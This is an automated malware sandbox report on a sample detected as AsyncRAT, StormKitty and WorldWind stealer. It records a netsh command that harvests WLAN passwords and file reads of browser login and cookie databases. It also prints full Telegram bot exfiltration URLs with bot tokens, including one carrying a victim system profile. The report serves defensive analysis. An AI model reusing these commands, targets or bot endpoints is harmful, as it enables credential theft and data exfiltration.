Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr All	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show networks mode=bssid	Jump to behavior

Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Queries volume information: C:\Users\user\Desktop\Kh7W85ONS7.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Kh7W85ONS7.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Yara detected AsyncRAT

Source: Yara match	File source: 6.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Kh7W85ONS7.exe.3bf4932.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Kh7W85ONS7.exe.3c763d0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Kh7W85ONS7.exe.3c763d0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Kh7W85ONS7.exe.3bf4932.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2127288804.0000000003B69000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2613909834.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2127288804.0000000003BC9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Kh7W85ONS7.exe PID: 7368, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 8040, type: MEMORYSTR

Uses netsh to modify the Windows network and firewall settings

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile

Source: MSBuild.exe, 00000006.00000002.2628943670.0000000005D4E000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Stealing of Sensitive Information

Yara detected StormKitty Stealer

Source: Yara match	File source: 6.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Kh7W85ONS7.exe.3bf4932.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Kh7W85ONS7.exe.3c763d0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Kh7W85ONS7.exe.3c763d0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Kh7W85ONS7.exe.3bf4932.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2127288804.0000000003B69000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2617809972.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2613909834.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2127288804.0000000003BC9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Kh7W85ONS7.exe PID: 7368, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 8040, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: 6.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Kh7W85ONS7.exe.3bf4932.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Kh7W85ONS7.exe.3c763d0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Kh7W85ONS7.exe.3c763d0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Kh7W85ONS7.exe.3bf4932.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2127288804.0000000003B69000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2617809972.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2613909834.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2127288804.0000000003BC9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Kh7W85ONS7.exe PID: 7368, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 8040, type: MEMORYSTR

Yara detected WorldWind Stealer

Source: Yara match

File source: Process Memory Space: MSBuild.exe PID: 8040, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: Kh7W85ONS7.exe, 00000000.00000002.2127288804.0000000003B69000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Electrum#\Electrum\wallets
Source: Kh7W85ONS7.exe, 00000000.00000002.2127288804.0000000003B69000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: \bytecoinJaxxk\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb
Source: Kh7W85ONS7.exe, 00000000.00000002.2127288804.0000000003B69000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Exodus+\Exodus\exodus.wallet
Source: Kh7W85ONS7.exe, 00000000.00000002.2127288804.0000000003B69000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Ethereum%\Ethereum\keystore
Source: Kh7W85ONS7.exe, 00000000.00000002.2127288804.0000000003B69000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Exodus+\Exodus\exodus.wallet
Source: Kh7W85ONS7.exe, 00000000.00000002.2127288804.0000000003B69000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Ethereum%\Ethereum\keystore
Source: Kh7W85ONS7.exe, 00000000.00000002.2127288804.0000000003B69000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Coinomi1\Coinomi\Coinomi\wallets
Source: Kh7W85ONS7.exe, 00000000.00000002.2127288804.0000000003B69000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Ethereum%\Ethereum\keystore

Tries to harvest and steal WLAN passwords

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile	Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite	Jump to behavior

Source: Yara match	File source: 6.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Kh7W85ONS7.exe.3bf4932.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Kh7W85ONS7.exe.3c763d0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Kh7W85ONS7.exe.3c763d0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Kh7W85ONS7.exe.3bf4932.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2127288804.0000000003B69000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2617809972.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2613909834.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2127288804.0000000003BC9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Kh7W85ONS7.exe PID: 7368, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 8040, type: MEMORYSTR

Remote Access Functionality

Yara detected StormKitty Stealer

Source: Yara match	File source: 6.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Kh7W85ONS7.exe.3bf4932.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Kh7W85ONS7.exe.3c763d0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Kh7W85ONS7.exe.3c763d0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Kh7W85ONS7.exe.3bf4932.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2127288804.0000000003B69000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2617809972.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2613909834.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2127288804.0000000003BC9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Kh7W85ONS7.exe PID: 7368, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 8040, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: 6.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Kh7W85ONS7.exe.3bf4932.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Kh7W85ONS7.exe.3c763d0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Kh7W85ONS7.exe.3c763d0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Kh7W85ONS7.exe.3bf4932.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2127288804.0000000003B69000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2617809972.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2613909834.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2127288804.0000000003BC9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Kh7W85ONS7.exe PID: 7368, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 8040, type: MEMORYSTR

Yara detected WorldWind Stealer

Source: Yara match

File source: Process Memory Space: MSBuild.exe PID: 8040, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	1 Valid Accounts	111 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	1 OS Credential Dumping	2 File and Directory Discovery	Remote Services	1 Archive Collected Data	2 Web Service	Exfiltration Over Other Network Medium	1 Data Encrypted for Impact
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 Valid Accounts	1 Valid Accounts	121 Obfuscated Files or Information	1 Input Capture	114 System Information Discovery	Remote Desktop Protocol	2 Data from Local System	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	1 Scheduled Task/Job	1 Access Token Manipulation	12 Software Packing	Security Account Manager	321 Security Software Discovery	SMB/Windows Admin Shares	1 Screen Capture	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	311 Process Injection	1 DLL Side-Loading	NTDS	1 Process Discovery	Distributed Component Object Model	1 Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	1 Scheduled Task/Job	1 Masquerading	LSA Secrets	241 Virtualization/Sandbox Evasion	SSH	Keylogging	4 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Valid Accounts	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Access Token Manipulation	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	241 Virtualization/Sandbox Evasion	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	311 Process Injection	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	1 Hidden Files and Directories	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Kh7W85ONS7.exe	45%	Virustotal		Browse
Kh7W85ONS7.exe	37%	ReversingLabs	ByteCode-MSIL.Trojan.DarkTortilla
Kh7W85ONS7.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
https://support.mozilla.org	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
https://raw.githubusercontent.com/LimerBoy/StormKitty/master/StormKitty/stub/packages/DotNetZip.1.13	0%	Avira URL Cloud	safe
https://support.mozilla.org/products/firefoxgro.allizom.troppus.elMx_wJzrE6l	0%	Avira URL Cloud	safe
https://duckduckgo.com/ac/?q=	0%	Avira URL Cloud	safe
https://api.telegram.org/bot5390757788:AAFV65Ydun9OP40g78XxI5eDbV42KqHY5mU/sendDocument?chat_id=5283	0%	Avira URL Cloud	safe
https://api.telegram.org	0%	Avira URL Cloud	safe
https://api.telegram.org/bot	0%	Avira URL Cloud	safe
https://duckduckgo.com/chrome_newtab	0%	Avira URL Cloud	safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Avira URL Cloud	safe
https://api.telegram.org/bot7322917184:AAEZSbuOE5wiEr26jHjFYvUlp0J9RAox2lU/sendMessage?chat_id=5635047295&text=%F0%9F%93%81%20Uploading%20Log%20Folders...	0%	Avira URL Cloud	safe
https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15	0%	Avira URL Cloud	safe
https://api.telegram.org/bot7322917184:AAEZSbuOE5wiEr26jHjFYvUlp0J9RAox2lU/sendDocument?chat_id=5635	0%	Avira URL Cloud	safe
https://api.telegram.org/bot5390757788:AAFV65Ydun9OP40g78XxI5eDbV42KqHY5mU/sendDocument?chat_id=5283662956	0%	Avira URL Cloud	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Avira URL Cloud	safe
http://pastebin.comd	0%	Avira URL Cloud	safe
https://api.telegram.orgD	0%	Avira URL Cloud	safe
https://api.telegram.org/bot7322917184:AAEZSbuOE5wiEr26jHjFYvUlp0J9RAox2lU/sendMessage?chat_id=5635047295&text=%0A%20%20%F0%9F%8C%AA%20WorldWind%20Pro%20-%20Results:%0ADate:%202024-07-01%203:19:22%20am%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20user%0ACompName:%20960781%0ALanguage:%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus:%20Windows%20Defender.%0A%0A%20%20%F0%9F%92%BB%20Hardware:%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20B3BZ8W6Y%0ARAM:%204095MB%0AHWID:%20B4D18CF796%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x1024%0A%0A%20%20%F0%9F%93%A1%20Network:%20%0AGateway%20IP:%20192.168.2.1%0AInternal%20IP:%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system!%0AExternal%20IP:%208.46.123.33%0ABSSID:%2000:50:56:a7:21:15%0A%0A%20%20%F0%9F%92%B8%20Domains%20info:%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20Bank%20Logs%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20Crypto%20Logs%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20Freaky%20Logs%20(No%20data)%0A%0A%20%20%F0%9F%8C%90%20Logs:%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks:%205%0A%0A%20%20%F0%9F%97%83%20Software:%0A%0A%20%20%F0%9F%A7%AD%20Device:%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%93%84%20File%20Grabber:%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%2011%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Documents:%2060%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Images:%2040%0A%0A%20Telegram%20Channel:%20@X_Splinter&parse_mode=Markdown&disable_web_page_preview=True	0%	Avira URL Cloud	safe
http://icanhazip.com/	0%	Avira URL Cloud	safe
https://github.com/LimerBoy/StormKitty	0%	Avira URL Cloud	safe
https://pastebin.com/raw/7B75u64Bd	0%	Avira URL Cloud	safe
https://api.telegram.org/bot7322917184:AAEZSbuOE5wiEr26jHjFYvUlp0J9RAox2lU/sendMessage?chat_id=56350	0%	Avira URL Cloud	safe
https://github.com/LimerBoy/StormKitty0&	0%	Avira URL Cloud	safe
https://pastebin.com	0%	Avira URL Cloud	safe
http://api.telegram.orgd	0%	Avira URL Cloud	safe
https://pastebin.com/raw/7B75u64B	0%	Avira URL Cloud	safe
http://api.telegram.org	0%	Avira URL Cloud	safe
https://api.telegram.org/bot7322917184:AAEZSbuOE5wiEr26jHjFYvUlp0J9RAox2lU/sendDocument?chat_id=5635047295	0%	Avira URL Cloud	safe
https://api.telegram.org/file/bot	0%	Avira URL Cloud	safe
http://pastebin.com	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
bg.microsoft.map.fastly.net	199.232.214.172	true	false	unknown
www.google.com	216.58.206.68	true	false	unknown
api.mylnikov.org	104.21.44.66	true	false	unknown
api.telegram.org	149.154.167.220	true	true	unknown
pastebin.com	104.20.3.235	true	true	unknown
fp2e7a.wpc.phicdn.net	192.229.221.95	true	false	unknown
icanhazip.com	104.16.185.241	true	true	unknown
13.169.14.0.in-addr.arpa	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15	false	Avira URL Cloud: safe	unknown
https://api.telegram.org/bot7322917184:AAEZSbuOE5wiEr26jHjFYvUlp0J9RAox2lU/sendMessage?chat_id=5635047295&text=%F0%9F%93%81%20Uploading%20Log%20Folders...	false	Avira URL Cloud: safe	unknown
http://icanhazip.com/	true	Avira URL Cloud: safe	unknown
https://api.telegram.org/bot5390757788:AAFV65Ydun9OP40g78XxI5eDbV42KqHY5mU/sendDocument?chat_id=5283662956	false	Avira URL Cloud: safe	unknown
https://api.telegram.org/bot7322917184:AAEZSbuOE5wiEr26jHjFYvUlp0J9RAox2lU/sendMessage?chat_id=5635047295&text=%0A%20%20%F0%9F%8C%AA%20WorldWind%20Pro%20-%20Results:%0ADate:%202024-07-01%203:19:22%20am%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20user%0ACompName:%20960781%0ALanguage:%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus:%20Windows%20Defender.%0A%0A%20%20%F0%9F%92%BB%20Hardware:%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20B3BZ8W6Y%0ARAM:%204095MB%0AHWID:%20B4D18CF796%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x1024%0A%0A%20%20%F0%9F%93%A1%20Network:%20%0AGateway%20IP:%20192.168.2.1%0AInternal%20IP:%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system!%0AExternal%20IP:%208.46.123.33%0ABSSID:%2000:50:56:a7:21:15%0A%0A%20%20%F0%9F%92%B8%20Domains%20info:%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20Bank%20Logs%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20Crypto%20Logs%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20Freaky%20Logs%20(No%20data)%0A%0A%20%20%F0%9F%8C%90%20Logs:%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks:%205%0A%0A%20%20%F0%9F%97%83%20Software:%0A%0A%20%20%F0%9F%A7%AD%20Device:%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%93%84%20File%20Grabber:%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%2011%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Documents:%2060%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Images:%2040%0A%0A%20Telegram%20Channel:%20@X_Splinter&parse_mode=Markdown&disable_web_page_preview=True	false	Avira URL Cloud: safe	unknown
https://pastebin.com/raw/7B75u64B	false	Avira URL Cloud: safe	unknown
https://api.telegram.org/bot7322917184:AAEZSbuOE5wiEr26jHjFYvUlp0J9RAox2lU/sendDocument?chat_id=5635047295	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	tmpD17D.tmp.dat.6.dr, tmpD1B0.tmp.dat.6.dr	false	Avira URL Cloud: safe	unknown
https://api.telegram.org/bot5390757788:AAFV65Ydun9OP40g78XxI5eDbV42KqHY5mU/sendDocument?chat_id=5283	MSBuild.exe, 00000006.00000002.2617809972.00000000031E1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	tmpD17D.tmp.dat.6.dr, tmpD1B0.tmp.dat.6.dr	false	Avira URL Cloud: safe	unknown
https://raw.githubusercontent.com/LimerBoy/StormKitty/master/StormKitty/stub/packages/DotNetZip.1.13	Kh7W85ONS7.exe, 00000000.00000002.2127288804.0000000003B69000.00000004.00000800.00020000.00000000.sdmp, Kh7W85ONS7.exe, 00000000.00000002.2127288804.0000000003BC9000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2613909834.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.telegram.org	MSBuild.exe, 00000006.00000002.2617809972.0000000002F6F000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	tmpD17D.tmp.dat.6.dr, tmpD1B0.tmp.dat.6.dr	false	Avira URL Cloud: safe	unknown
https://api.telegram.org/bot	MSBuild.exe, 00000006.00000002.2613909834.0000000000402000.00000040.00000400.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://support.mozilla.org/products/firefoxgro.allizom.troppus.elMx_wJzrE6l	places.raw.6.dr	false	Avira URL Cloud: safe	unknown
https://api.telegram.org/bot7322917184:AAEZSbuOE5wiEr26jHjFYvUlp0J9RAox2lU/sendDocument?chat_id=5635	MSBuild.exe, 00000006.00000002.2617809972.0000000003155000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	tmpD17D.tmp.dat.6.dr, tmpD1B0.tmp.dat.6.dr	false	Avira URL Cloud: safe	unknown
https://api.telegram.orgD	MSBuild.exe, 00000006.00000002.2617809972.0000000003155000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2617809972.000000000317B000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pastebin.comd	MSBuild.exe, 00000006.00000002.2617809972.0000000003197000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	tmpD17D.tmp.dat.6.dr, tmpD1B0.tmp.dat.6.dr	false	URL Reputation: safe	unknown
https://www.ecosia.org/newtab/	tmpD17D.tmp.dat.6.dr, tmpD1B0.tmp.dat.6.dr	false	URL Reputation: safe	unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	places.raw.6.dr	false	URL Reputation: safe	unknown
https://pastebin.com/raw/7B75u64Bd	MSBuild.exe, 00000006.00000002.2617809972.0000000003197000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
